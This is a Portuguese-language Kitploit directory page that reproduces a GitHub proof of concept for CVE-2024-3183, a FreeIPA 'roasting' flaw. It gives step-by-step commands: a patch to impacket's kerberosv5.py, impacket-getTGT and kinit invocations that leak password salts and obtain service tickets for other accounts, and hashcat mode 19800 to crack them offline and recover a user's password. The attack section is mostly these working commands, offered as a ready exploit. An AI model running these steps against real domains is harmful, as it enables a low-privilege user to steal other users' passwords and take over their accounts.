Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-3183-POC — POC para CVE-2024-3183 (FreeIPA Rosting) | Kitploit
Ferramentas/GitHubGitHub/im10n/cve-2024-3183-poc
Ataques de SenhaAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoAutenticação
GitHubim10n/cve-2024-3183-poc

CVE-2024-3183-POC

POC para CVE-2024-3183 (FreeIPA Rosting)

Ver Repositório
2924há 2 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-3183-POC

POC para CVE-2024-3183 (FreeIPA Rosting)

Impacto: Um usuário com baixos privilégios pode obter um hash das senhas de todos os usuários do domínio e realizar força bruta offline (kerberoasting).

Patch do impacket-getTGT:

  1. Adicione decoder.decode.defaultErrorState = stGetValueDecoderByTag a impacket/krb5/kerberosv5.py.
  2. Aproveite!

POC1:

  1. Adicione decoder.decode.defaultErrorState = stGetValueDecoderByTag a impacket/krb5/kerberosv5.py.
  2. Você pode usar o impacket-getTGT com a opção -service e a opção -debug para obter o salt em um único comando. impacket-getTGT test.local/user -debug -service admin

POC2:

  1. Primeiro, vamos solicitar um ticket TGT para um usuário já comprometido "admin". kinit user foto1
  2. Em segundo lugar, vamos descobrir o salt do usuário "admin": printf "%b" "0\n" | KRB5_TRACE=/dev/stdout kinit admin | grep salt foto2
  3. Obtenha o TGS para "admin": kvno admin foto foto3
  4. Use o script python (ou hashcat mod 19800 com salt específico) para força bruta do TGS foto4

1 - TGS, 2 - SALT, 3 - Senhas.

  1. Parabéns, agora temos a senha do usuário "admin".

POC3:

  1. Você pode usar o kinit de uma só vez: kinit -S target user

e você obtém um TGT que é criptografado pela chave do usuário alvo.

Baixar ferramenta